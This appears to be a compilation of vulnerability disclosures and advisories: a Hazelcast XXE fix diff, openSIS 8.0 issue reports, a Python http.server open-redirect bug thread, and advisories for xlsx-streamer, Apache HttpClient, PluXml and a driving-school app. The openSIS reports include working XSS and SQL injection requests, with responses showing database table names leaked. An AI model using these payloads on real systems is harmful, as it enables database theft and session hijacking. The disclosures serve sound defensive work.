Improper Restriction of XML External Entity Reference in GitHub repository hazelcast/hazelcast prior to 5.1.

@@ -25,6 +25,8 @@ import javax.xml.XMLConstants; import javax.xml.parsers.DocumentBuilderFactory; import javax.xml.parsers.ParserConfigurationException; import javax.xml.parsers.SAXParserFactory; import javax.xml.stream.XMLInputFactory; import javax.xml.transform.ErrorListener; import javax.xml.transform.OutputKeys; import javax.xml.transform.Source; @@ -41,7 +43,10 @@ import com.hazelcast.logging.Logger;  
/\*\* \* Utility class for XML processing. \* Utility class for XML processing. It contains several methods to retrieve XML processing factories with XXE protection \* enabled (based on recommendation in the \* <a href\="https://cheatsheetseries.owasp.org/cheatsheets/XML\_External\_Entity\_Prevention\_Cheat\_Sheet.html"\>OWASP XXE prevention \* cheat-sheet</a>). \*/ public final class XmlUtil {  
@@ -55,6 +60,7 @@ \*/ public static final String SYSTEM\_PROPERTY\_IGNORE\_XXE\_PROTECTION\_FAILURES \= "hazelcast.ignoreXxeProtectionFailures";  
private static final String FEATURES\_DISALLOW\_DOCTYPE \= "http://apache.org/xml/features/disallow-doctype-decl"; private static final ILogger LOGGER \= Logger.getLogger(XmlUtil.class);  
private XmlUtil() { @@ -68,7 +74,7 @@ private XmlUtil() { public static DocumentBuilderFactory getNsAwareDocumentBuilderFactory() throws ParserConfigurationException { DocumentBuilderFactory dbf \= DocumentBuilderFactory.newInstance(); dbf.setNamespaceAware(true); setFeature(dbf, "http://apache.org/xml/features/disallow-doctype-decl"); setFeature(dbf, FEATURES\_DISALLOW\_DOCTYPE); return dbf; }  
@@ -92,6 +98,24 @@ public static SchemaFactory getSchemaFactory() throws SAXException { return schemaFactory; }  
/\*\* \* Returns {@link SAXParserFactory} with XXE protection enabled. \*/ public static SAXParserFactory getSAXParserFactory() throws ParserConfigurationException, SAXException { SAXParserFactory factory \= SAXParserFactory.newInstance(); setFeature(factory, FEATURES\_DISALLOW\_DOCTYPE); return factory; }  
/\*\* \* Returns {@link XMLInputFactory} with XXE protection enabled. \*/ public static XMLInputFactory getXMLInputFactory() { XMLInputFactory xmlInputFactory \= XMLInputFactory.newInstance(); setProperty(xmlInputFactory, XMLInputFactory.SUPPORT\_DTD, false); return xmlInputFactory; }  
/\*\* \* Formats given XML String with the given indentation used. If the {@code input} XML string is {@code null}, or \* {@code indent} parameter is negative, or XML transformation fails, then the original value is returned unchanged. The @@ -166,62 +190,63 @@ static void setAttribute(TransformerFactory transformerFactory, String attribute try { transformerFactory.setAttribute(attributeName, ""); } catch (IllegalArgumentException iae) { if (Boolean.getBoolean(SYSTEM\_PROPERTY\_IGNORE\_XXE\_PROTECTION\_FAILURES)) { LOGGER.warning("Enabling XXE protection failed. The attribute " + attributeName + " is not supported by the TransformerFactory. The " + SYSTEM\_PROPERTY\_IGNORE\_XXE\_PROTECTION\_FAILURES + " system property is used so the XML processing continues in the UNSECURE mode" + " with XXE protection disabled!!!"); } else { LOGGER.severe("Enabling XXE protection failed. The attribute " + attributeName + " is not supported by the TransformerFactory. This usually mean an outdated XML processor" + " is present on the classpath (e.g. Xerces, Xalan). If you are not able to resolve the issue by" + " fixing the classpath, the " + SYSTEM\_PROPERTY\_IGNORE\_XXE\_PROTECTION\_FAILURES + " system property can be used to disable XML External Entity protections." + " We don't recommend disabling the XXE as such the XML processor configuration is unsecure!!!", iae); throw iae; } printWarningAndRethrowEventually(iae, TransformerFactory.class, "attribute " + attributeName); } }  
static void setFeature(DocumentBuilderFactory dbf, String featureName) throws ParserConfigurationException { try { dbf.setFeature(featureName, true); } catch (ParserConfigurationException e) { if (Boolean.getBoolean(SYSTEM\_PROPERTY\_IGNORE\_XXE\_PROTECTION\_FAILURES)) { LOGGER.warning("Enabling XXE protection failed. The feature " + featureName + " is not supported by the DocumentBuilderFactory. The " + SYSTEM\_PROPERTY\_IGNORE\_XXE\_PROTECTION\_FAILURES + " system property is used so the XML processing continues in the UNSECURE mode" + " with XXE protection disabled!!!"); } else { LOGGER.severe("Enabling XXE protection failed. The feature " + featureName + " is not supported by the DocumentBuilderFactory. This usually mean an outdated XML processor" + " is present on the classpath (e.g. Xerces, Xalan). If you are not able to resolve the issue by" + " fixing the classpath, the " + SYSTEM\_PROPERTY\_IGNORE\_XXE\_PROTECTION\_FAILURES + " system property can be used to disable XML External Entity protections." + " We don't recommend disabling the XXE as such the XML processor configuration is unsecure!!!", e); throw e; } printWarningAndRethrowEventually(e, DocumentBuilderFactory.class, "feature " + featureName); } }  
static void setFeature(SAXParserFactory saxParserFactory, String featureName) throws ParserConfigurationException, SAXException { try { saxParserFactory.setFeature(featureName, true); } catch (SAXException e) { printWarningAndRethrowEventually(e, SAXParserFactory.class, "feature " + featureName); } catch (ParserConfigurationException e) { printWarningAndRethrowEventually(e, SAXParserFactory.class, "feature " + featureName); } }  
static void setProperty(SchemaFactory schemaFactory, String propertyName) throws SAXException { try { schemaFactory.setProperty(propertyName, ""); } catch (SAXException e) { if (Boolean.getBoolean(SYSTEM\_PROPERTY\_IGNORE\_XXE\_PROTECTION\_FAILURES)) { LOGGER.warning("Enabling XXE protection failed. The property " + propertyName + " is not supported by the SchemaFactory. The " + SYSTEM\_PROPERTY\_IGNORE\_XXE\_PROTECTION\_FAILURES + " system property is used so the XML processing continues in the UNSECURE mode" + " with XXE protection disabled!!!"); } else { LOGGER.severe("Enabling XXE protection failed. The property " + propertyName + " is not supported by the SchemaFactory. This usually mean an outdated XML processor" + " is present on the classpath (e.g. Xerces, Xalan). If you are not able to resolve the issue by" + " fixing the classpath, the " + SYSTEM\_PROPERTY\_IGNORE\_XXE\_PROTECTION\_FAILURES + " system property can be used to disable XML External Entity protections." + " We don't recommend disabling the XXE as such the XML processor configuration is unsecure!!!", e); throw e; } printWarningAndRethrowEventually(e, SchemaFactory.class, "property " + propertyName); } }  
static void setProperty(XMLInputFactory xmlInputFactory, String propertyName, Object value) { try { xmlInputFactory.setProperty(propertyName, value); } catch (IllegalArgumentException e) { printWarningAndRethrowEventually(e, XMLInputFactory.class, "property " + propertyName); } }  
private static <T extends Exception\> void printWarningAndRethrowEventually(T cause, Class<?> clazz, String objective) throws T { String className \= clazz.getSimpleName(); if (Boolean.getBoolean(SYSTEM\_PROPERTY\_IGNORE\_XXE\_PROTECTION\_FAILURES)) { LOGGER.warning("Enabling XXE protection failed. The " + objective + " is not supported by the " + className + ". The " + SYSTEM\_PROPERTY\_IGNORE\_XXE\_PROTECTION\_FAILURES + " system property is used so the XML processing continues in the UNSECURE mode" + " with XXE protection disabled!!!"); } else { LOGGER.severe( "Enabling XXE protection failed. The " + objective + " is not supported by the " + className + ". This usually mean an outdated XML processor" + " is present on the classpath (e.g. Xerces, Xalan). If you are not able to resolve the issue by" + " fixing the classpath, the " + SYSTEM\_PROPERTY\_IGNORE\_XXE\_PROTECTION\_FAILURES + " system property can be used to disable XML External Entity protections." + " We don't recommend disabling the XXE as such the XML processor configuration is unsecure!", cause); throw cause; } }

CVE-2022-0265: Add helper method to XmlUtil to enable XXE protection in the SAXParse… · hazelcast/hazelcast@4d6b666

OS4ED openSIS 8.0 is affected by cross-site scripting (XSS) in EmailCheckOthers.php. An attacker can inject JavaScript code to get the user's cookie and take over the working session of user.

**Description**

By injecting Javascript code, an attacker can steal the user's cookie and take over the user's account. This happened because of the lack of security implementation for`type` parameter. This was tested on demo website

**Exploitation**

![Screenshot from 2021-09-05 14-06-22](https://user-images.githubusercontent.com/35491855/132122706-da7fec3a-2b7b-433b-b059-a25f7cf604ae.jpg)

**Injection point:**  
`HTTP://demo/EmailCheckOthers.php?opt=<script>alert(1)</script>&email=asfasf`  
**Request:**

GET /EmailCheckOthers.php?opt=%3Cscript%3Ealert(1)%3C/script%3E&email=asfasf HTTP/1.1
Host: demo.opensis.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=iadm2hjbvs4vqmskk07vcpp8n5; miniSidebar=0
Upgrade-Insecure-Requests: 1

**Response:**

HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 09:57:28 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

**Solution:**

Before using any user's input, make sure to verify and sanitize it properly, trust nothing that's sent from the client. In the case of XSS, please consider using `htmlentities()` function to encode the user's input before printing it out to the user's screen

CVE-2021-40637: Reflected XSS in EmailCheckOthers.php · Issue #199 · OS4ED/openSIS-Classic

OS4ED openSIS 8.0 is affected by SQL injection in ChooseCpSearch.php, ChooseRequestSearch.php. An attacker can inject a SQL query to extract information from the database.

Due to no security mechanism was implemented in parameter `id`, attacker can inject arbitrary SQL query and extract database informations

![Screenshot from 2021-09-01 22-34-35](https://user-images.githubusercontent.com/35491855/131700825-f4e7a36a-22d2-43fb-b442-948cd4c9a4b8.png)

**Vulnerable code section**

**ChooseCpSearch.php**  
![Screenshot from 2021-09-01 22-37-03](https://user-images.githubusercontent.com/35491855/131702274-8fc8f7a3-0d0a-46f0-b5b8-0e222fa8f64b.jpg)  
**ChooseRequestSearch.php**  
![Screenshot from 2021-09-01 22-40-53](https://user-images.githubusercontent.com/35491855/131702347-eabb8531-9631-4bd9-a12c-8096e9ec85b5.jpg)

**Request and Response**

GET /ChooseRequestSearch.php?id=1'+union+select+1,group\_concat(table\_name),3+FROM+information\_schema.tables+WHERE+table\_schema=database()--+-&table\_name=courses HTTP/1.1
Host: demo.opensis.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://demo.opensis.com/Modules.php?modname=miscellaneous/Portal.php&failed\_login=
Cookie: PHPSESSID=hlbs4pioon9tgupfig1n2hsgu1

HTTP/1.1 200 OK
Date: Wed, 01 Sep 2021 15:34:05 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1194
Connection: close
Content-Type: text/html

course\_modal\_request||**3 courses were found.**

Course

Reading

Writing

api\_info,app,attendance\_calendar,attendance\_code\_categories,attendance\_codes,attendance\_completed,attendance\_day,attendance\_period,calendar\_events,calendar\_events\_visibility,course\_details,course\_period\_var,course\_periods,course\_subjects,courses,custom\_fields,device\_info,eligibility,eligibility\_activities,eligibility\_completed,enroll\_grade

CVE-2021-40635: SQL Injection in id Parameter · Issue #195 · OS4ED/openSIS-Classic

OS4ED openSIS 8.0 is affected by SQL Injection in CheckDuplicateName.php, which can extract information from the database.

**Description**

Due to lack of protection, parameters `table_name`, `field_name`, `id`, `field_id` can be abused to injection SQL queries to extract information from databases some other SQLi tricks, parameter `msg` can be used to inject XSS payload and steal user's cookie (and even takeover user's account)  
![Screenshot from 2021-09-05 14-45-56(1)](https://user-images.githubusercontent.com/35491855/132119553-61eec465-0e9f-4276-bd86-aa278de2338d.jpg)

As we can see, no security mechanism was implemented which resulted in a lot of vulnerabilities.

**Exploiting**

![Screenshot from 2021-09-05 14-51-24](https://user-images.githubusercontent.com/35491855/132120089-1ba16847-7260-4872-ad53-c8d6c7c39901.jpg)

**Injection point**:  
`HTTP://demo/CheckDuplicateName.php?table_name=api_info+where+id=1+and+extractvalue(0x0a,concat(0x0a,(select+database())))--&field_name=&val=&field_id=&msg=`

In beneath, I've presented how information can be extracted via SQL injection. XSS can be exploited by giving the correct information in other parameters and inject Javascript code in `field_name`, `msg`.

**Request:**

GET /CheckDuplicateName.php?table\_name=api\_info+where+id=1+and+extractvalue(0x0a,concat(0x0a,(select+database())))--&field\_name=&val=&field\_id=&msg= HTTP/1.1
Host: demo.opensis.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=iadm2hjbvs4vqmskk07vcpp8n5; miniSidebar=0
Upgrade-Insecure-Requests: 1

**Response:**

HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 07:59:18 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 716
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/htmlx

**Solution**

Add security functions such as `sqlSecurityFilter` to sanitize parameters before processing or printing out to the screen. For XSS, use `htmlentities` to properly encode the output.

CVE-2021-40636: XSS and Error based SQL injection in CheckDuplicateName.php · Issue #198 · OS4ED/openSIS-Classic

A vulnerability was found in openstack-nova's console proxy, noVNC. By crafting a malicious URL, noVNC could be made to redirect to any desired URL.

Created on **2017-11-20 13:49** by **vstinner**, last changed **2021-05-21 23:10** by **ned.deily**. This issue is now **closed**.

Messages (6)

msg306540 - (view)

Author: STINNER Victor (vstinner) \* ![(Python committer)](https://bugs.python.org/@@file/committer.png "Python committer")

Date: 2017-11-20 13:49

iDer reported a vulnerability in the HTTP server.

(1) Start a local HTTP server (listen to tcp/8000):

python3 -m http.server 8000

(2) Open a web browser and to go:

http://localhost:8000//www.python.org/%2f..

=> the browser is redirected to http://www.python.org/%2f../

(on this example, the python.org web server redirects to https://www.python.org/%2f../ )


Raw HTTP to see the HTTP redirection using netcat:
---
$ echo -ne "GET //www.python.org/%2f.. HTTP/1.0\\n\\n" | nc localhost 8000
HTTP/1.0 301 Moved Permanently
Server: SimpleHTTP/0.6 Python/3.6.2
Date: Mon, 20 Nov 2017 13:31:42 GMT
Location: //www.python.org/%2f../
---

The problem is in the SimpleHTTPRequestHandler.send\_head() function:

\* self.path = '//www.python.org/%2f..'
\* translate\_path() translates '//www.python.org//..' path to self.directory (the current directory by default).
\* isdir(self.directory) is True but self.path doesn't send with '/', so send\_head() creates a HTTP redirection (HTTP 301)
\* The redirection URL is '//www.python.org/%2f../'. Extract of the raw HTTP: "Location: //www.python.org/%2f../"

The web browsers translates the URL '//www.python.org/%2f../' to "http://www.python.org/%2f../"... It surprised me, but ok, it's a fact.

I'm not sure what is the best way to fix this vulnerability without rejecting valid HTTP requests.

IMHO the root issue is the redirection URL starting with "//". I would expect something like "localhost//". The problem is that I'm not sure that the HTTP server knows its own "external" hostname. "localhost" is wrong is the server is accessed from the outside. Maybe the server must just fail on that case?


This vulnerabilility was reported to the Python Security Response Team (PSRT) at October 18, 2017 (one month ago). Since no obvious fix was found, it was decided to make the vulnerability public to get more eyes on it to find a quick fix.

Note: I'm not sure that this vulnerability is important, since the redirected URL ends with "/%2f../" which should be rejected by any correct HTTP Server (say, not the Python builtin "simple" HTTP server...).

msg306542 - (view)

Author: STINNER Victor (vstinner) \* ![(Python committer)](https://bugs.python.org/@@file/committer.png "Python committer")

Date: 2017-11-20 14:02

Extract of send\_head():

        path = self.translate\_path(self.path)
        f = None
        if os.path.isdir(path):
            parts = urllib.parse.urlsplit(self.path)
            ...

urllib.parse.urlsplit('//www.python.org/%2f..') returns:

SplitResult(scheme='', netloc='www.python.org', path='/%2f..', query='', fragment='')

Is urlsplit() the correct function to call here? www.python.org is part of the path, not of the netloc.

msg306545 - (view)

Author: STINNER Victor (vstinner) \* ![(Python committer)](https://bugs.python.org/@@file/committer.png "Python committer")

Date: 2017-11-20 14:24

I wrote this patch, but I'm not sure that it's ok to always reject redirection URLs starting with //:

diff --git a/Lib/http/server.py b/Lib/http/server.py
index 502bce0c7a..494031b8c2 100644
--- a/Lib/http/server.py
+++ b/Lib/http/server.py
@@ -673,10 +673,18 @@ class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
             parts = urllib.parse.urlsplit(self.path)
             if not parts.path.endswith('/'):
                 # redirect browser - doing basically what apache does
-                self.send\_response(HTTPStatus.MOVED\_PERMANENTLY)
                 new\_parts = (parts\[0\], parts\[1\], parts\[2\] + '/',
                              parts\[3\], parts\[4\])
                 new\_url = urllib.parse.urlunsplit(new\_parts)
+
+                # Browsers interpret "Location: //uri" as an absolute URI
+                # like "http://URI"
+                if new\_url.startswith('//'):
+                    self.send\_error(HTTPStatus.BAD\_REQUEST,
+                                    "URI must not start with //")
+                    return None
+
+                self.send\_response(HTTPStatus.MOVED\_PERMANENTLY)
                 self.send\_header("Location", new\_url)
                 self.end\_headers()
                 return None

msg306992 - (view)

Author: Martin Panter (martin.panter) \* ![(Python committer)](https://bugs.python.org/@@file/committer.png "Python committer")

Date: 2017-11-26 05:28

Maybe a good fix would be to “escape” the double slash with “/.”:

if os.path.isdir(path):
    url = self.path
    if url.startswith('//'):  # E.g. "//www.python.org/%2f.."
        url = "/." + url  # Becomes "/.//www.python.org/%2f.."
    parts = urllib.parse.urlsplit(url)
    ...

When this “escaped” URL is resolved with the base URL, it should give the right result:

>>> base = "http://localhost:8000//www.python.org/%2f.."
>>> redirect = "/.//www.python.org/%2f../"
>>> urljoin(base, redirect)
'http://localhost:8000//www.python.org/%2f../'

A simpler idea is to strip off all but one of the leading slashes, so you end up with "/www.python.org/%2f..". That would technically be a different URL, but would access the same file through the default SimpleHTTPRequestHandler behaviour, so most people wouldn’t notice.

msg322677 - (view)

Author: Martin Panter (martin.panter) \* ![(Python committer)](https://bugs.python.org/@@file/committer.png "Python committer")

Date: 2018-07-30 13:39

In Issue 34276 I suggested a fix to “urlunsplit”. In this case it would send “Location: ////www.python.org/%2f../", with an extra pair of slashes denoting an empty host name. This should stop a browser from seeing “www.python.org” as a host name.

msg394169 - (view)

Author: Ned Deily (ned.deily) \* ![(Python committer)](https://bugs.python.org/@@file/committer.png "Python committer")

Date: 2021-05-21 23:10

This looks like a duplicate of Issue43223 which has a PR in progress.

History

Date

User

Action

Args

2021-05-21 23:10:46

ned.deily

set

status: open -> closed

superseder: \[security\] http.server: Open Redirection if the URL path starts with //

nosy: + ned.deily  
messages: + msg394169  
resolution: duplicate  
stage: resolved

2019-08-15 03:26:20

epicfaace

set

nosy: + epicfaace  

2018-07-30 13:39:40

martin.panter

set

messages: + msg322677

2017-11-26 05:28:23

martin.panter

set

nosy: + martin.panter  
messages: + msg306992  

2017-11-20 14:24:07

vstinner

set

messages: + msg306545

2017-11-20 14:02:11

vstinner

set

messages: + msg306542

2017-11-20 13:49:15

vstinner

create

CVE-2021-3654: Issue 32084: [Security] http.server can be abused to redirect to (almost) arbitrary URL

Excel-Streaming-Reader is an easy-to-use implementation of a streaming Excel reader using Apache POI. Prior to xlsx-streamer 2.1.0, the XML parser that was used did apply all the necessary settings to prevent XML Entity Expansion issues. Upgrade to version 2.1.0 to receive a patch. There is no known workaround.

**Improper Restriction of XML External Entity Reference in com.monitorjbl:xlsx-streamer**

**Package**

maven com.monitorjbl:xlsx-streamer (Maven)

**Affected versions**

< 2.1.0

**Description**

**Impact**

Prior to xlsx-streamer 2.1.0, the XML parser that was used did not apply all the necessary settings to prevent XML Entity Expansion issues.

**Patches**

Upgrade to version 2.1.0.

**Workarounds**

No known workaround.

**References**

0749c7b

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in monitorjbl/excel-streaming-reader

**CVE ID**

CVE-2022-23640

**GHSA ID**

GHSA-xvm2-9xvc-hx7f

**CWEs**

CVE-2022-23640: Build software better, together

An update for rh-maven36-httpcomponents-client is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2020-13956: apache-httpclient: incorrect handling of malformed authority component in request URIs


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

![Red Hat Customer Portal](https://access.redhat.com/chrome_themes/nimbus/img/red-hat-customer-portal.svg)

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus
*   Red Hat CodeReady Studio

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-03-01

Updated:

2022-03-01

**RHSA-2022:0722 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Moderate: rh-maven36-httpcomponents-client security update

**Type/Severity**

Security Advisory: Moderate

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for rh-maven36-httpcomponents-client is now available for Red Hat Software Collections.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

HttpClient is a HTTP/1.1 compliant HTTP agent implementation based on httpcomponents HttpCore. It also provides reusable components for client-side authentication, HTTP state management, and HTTP connection management.  

Security Fix(es):  

*   apache-httpclient: incorrect handling of malformed authority component in request URIs (CVE-2020-13956)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat Software Collections (for RHEL Server) 1 for RHEL 7 x86\_64
*   Red Hat Software Collections (for RHEL Server for System Z) 1 for RHEL 7 s390x
*   Red Hat Software Collections (for RHEL Server for IBM Power LE) 1 for RHEL 7 ppc64le
*   Red Hat Software Collections (for RHEL Workstation) 1 for RHEL 7 x86\_64

**Fixes**

*   BZ - 1886587 - CVE-2020-13956 apache-httpclient: incorrect handling of malformed authority component in request URIs

**Red Hat Software Collections (for RHEL Server) 1 for RHEL 7**

SRPM

rh-maven36-httpcomponents-client-4.5.9-1.3.el7.src.rpm

SHA-256: c30788f41e464d7eeda4f5bf1054d2d2aa0787d8942a4123af372c2ae0893157

x86\_64

rh-maven36-httpcomponents-client-4.5.9-1.3.el7.noarch.rpm

SHA-256: e92065229c0291d29ae4bddbaee48f81f248488108e80ae2fdac89fce1261db7

rh-maven36-httpcomponents-client-javadoc-4.5.9-1.3.el7.noarch.rpm

SHA-256: 2a192a93f2f41a3b82c560faa1887d320984cbd2d155038db34b548e70f886e8

**Red Hat Software Collections (for RHEL Server for System Z) 1 for RHEL 7**

SRPM

rh-maven36-httpcomponents-client-4.5.9-1.3.el7.src.rpm

SHA-256: c30788f41e464d7eeda4f5bf1054d2d2aa0787d8942a4123af372c2ae0893157

s390x

rh-maven36-httpcomponents-client-4.5.9-1.3.el7.noarch.rpm

SHA-256: e92065229c0291d29ae4bddbaee48f81f248488108e80ae2fdac89fce1261db7

rh-maven36-httpcomponents-client-javadoc-4.5.9-1.3.el7.noarch.rpm

SHA-256: 2a192a93f2f41a3b82c560faa1887d320984cbd2d155038db34b548e70f886e8

**Red Hat Software Collections (for RHEL Server for IBM Power LE) 1 for RHEL 7**

SRPM

rh-maven36-httpcomponents-client-4.5.9-1.3.el7.src.rpm

SHA-256: c30788f41e464d7eeda4f5bf1054d2d2aa0787d8942a4123af372c2ae0893157

ppc64le

rh-maven36-httpcomponents-client-4.5.9-1.3.el7.noarch.rpm

SHA-256: e92065229c0291d29ae4bddbaee48f81f248488108e80ae2fdac89fce1261db7

rh-maven36-httpcomponents-client-javadoc-4.5.9-1.3.el7.noarch.rpm

SHA-256: 2a192a93f2f41a3b82c560faa1887d320984cbd2d155038db34b548e70f886e8

**Red Hat Software Collections (for RHEL Workstation) 1 for RHEL 7**

SRPM

rh-maven36-httpcomponents-client-4.5.9-1.3.el7.src.rpm

SHA-256: c30788f41e464d7eeda4f5bf1054d2d2aa0787d8942a4123af372c2ae0893157

x86\_64

rh-maven36-httpcomponents-client-4.5.9-1.3.el7.noarch.rpm

SHA-256: e92065229c0291d29ae4bddbaee48f81f248488108e80ae2fdac89fce1261db7

rh-maven36-httpcomponents-client-javadoc-4.5.9-1.3.el7.noarch.rpm

SHA-256: 2a192a93f2f41a3b82c560faa1887d320984cbd2d155038db34b548e70f886e8

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:0722: Red Hat Security Advisory: rh-maven36-httpcomponents-client security update

Pluxml v5.8.7 was discovered to allow attackers to execute arbitrary code via crafted PHP code inserted into static pages.

![](https://camo.githubusercontent.com/b6d0ff03d84e1fa1c27bb0d96abe62fcca9ac77354395789486633f503c811db/68747470733a2f2f7777772e706c75786d6c2e6f72672f7468656d65732f706c75786d6c2d6f72672d312e302f696d672f706c782d6c6f676f2d626c65752e706e67)

![](https://camo.githubusercontent.com/c0ae7598d718ff7975a14d68a3f2b36f61834d0ad86e1b634ed0d598d5ffacc4/68747470733a2f2f62616467656e2e6e65742f6769746875622f72656c656173652f706c75786d6c2f706c75786d6c) ![](https://camo.githubusercontent.com/97fa22cfd980302772e3a8fbb6e6422067476e5442c19f3491a64c396031e009/68747470733a2f2f62616467656e2e6e65742f62616467652f6c6963656e73652f47504c2f677265656e) ![](https://camo.githubusercontent.com/6feadca13489be043acfe486800c41a69cbe8b548f80d6424ba764ba3f2e0616/68747470733a2f2f62616467656e2e6e65742f747769747465722f666f6c6c6f772f706c75786d6c)

Créez un site web performant en toute simplicité et sans base de données.

**Télécharger PluXml 5.8.7** (zip)

*   Version bugfix (5.8.8) en développement : master
*   Verison instable (6.0) en développement : 6.0

**Principales caractéristiques**

*   Aucune base de données requise
*   Portable sur clé USB
*   Multiutilisateurs avec des niveaux d'autorisations différents
*   Pages statiques, catégories, gestion des tags
*   Gestion des commentaires
*   Gestionnaire de médias
*   Traduit en 11 langues (français, allemand, anglais, espagnol, italien, néerlandais, occitan, polonais, portugais, roumain, russe)
*   Thèmes personnalisables
*   Plugins
*   Réécriture d'url (nécessite le module apache mod\_rewrite)

**Démonstration**

*   Blog
*   Administration

**Prérequis**

Que ce soit en local sur votre ordinateur ou sur internet, votre hébergement doit posséder les éléments suivants pour pouvoir utiliser PluXml :

*   PHP 7.2 ou supérieur
*   Librairie GD pour la gestion des images
*   Fonction PHP d'envoi d'emails autorisée (non obligatoire)
*   Le module Apache mod\_rewrite activé pour utiliser la réécriture d'url (non obligatoire)

**Procédure d'installation**

*   Récuperez l'archive téléchargeable sur cette page et dézippez la à la racine de votre site
*   Connectez-vous à votre site et suivez la procédure d'installation affichée à l'écran

**Mise à jour d'une version existante de PluXml**

*   **IMPORTANT** : Sauvegardez le dossier data de votre PluXml
*   Récuperez l'archive téléchargeable sur cette page et dézippez la à la racine de votre site de manière à écraser les fichiers existants
*   Connectez-vous à votre site et suivez la procédure de mise à jour affichée à l'écran

**Liens**

*   Site officiel
*   Forum
*   Thèmes et plugins
*   Documentation

CVE-2022-25018: GitHub - pluxml/PluXml: PluXml, Moteur de Blog et CMS à l'XML sans base de données

Car Driving School Management System v1.0 is affected by Cross Site Scripting (XSS) in the User Enrollment Form (Username Field). To exploit this Vulnerability, an admin views the registered user details.

\# Exploit Title: Car Driving School management System v1.0 - Blind Cross Site Scripting(XSS)

\# Exploit Author: NS Kumar (n1\_x)

\# Date: January 31, 2022

\# Vendor Homepage: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html

\# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cdsms\_1.zip

\# Tested on: Parrot Linux, Apache, Mysql

\# Vendor: oretnom23

\# Version: v1.0

\# Exploit Description:

\# Car Driving School management System v1.0 suffers from Blind XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.

